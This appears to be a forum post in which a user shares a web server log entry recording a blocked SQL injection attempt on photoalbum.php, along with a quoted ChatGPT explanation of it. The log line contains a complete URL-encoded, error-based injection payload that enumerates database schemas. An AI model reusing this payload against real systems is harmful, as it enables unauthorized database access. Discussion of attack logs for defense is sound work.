4.206.81.128 - - [09/Sep/2024:16:38:35 +0000] "GET /photoalbum.php?id=1343+%2F%2A%2A%2F%2F%2A%2A%2FOR%2F%2A%2A%2FROW%282018%2C1386%29%3E%28SELECT%2F%2A%2A%2FCOUNT%28%2A%29%2CCONCAT%280x4c68454a%2C%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28schema_name%29%2F%2A%2A%2FAS%2F%2A%2A%2FNCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C0x59566c56%2CFLOOR%28RAND%280%29%2A2%29%29x%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F2027%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F8505%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F7491%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F4808%29a%2F%2A%2A%2FGROUP%2F%2A%2A%2FBY%2F%2A%2A%2Fx%29 HTTP/1.1" 403 177 "-" "Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1"
Ryan wrote:Interesting, ChatGPT came up with this below. But the SQL seems to be just trying to collect schema information at this point.
Conclusion:
This request appears to be part of an SQL Injection attack targeting the photoalbum.php page by manipulating the id parameter to execute malicious SQL code. The server correctly blocked it with a 403 Forbidden response.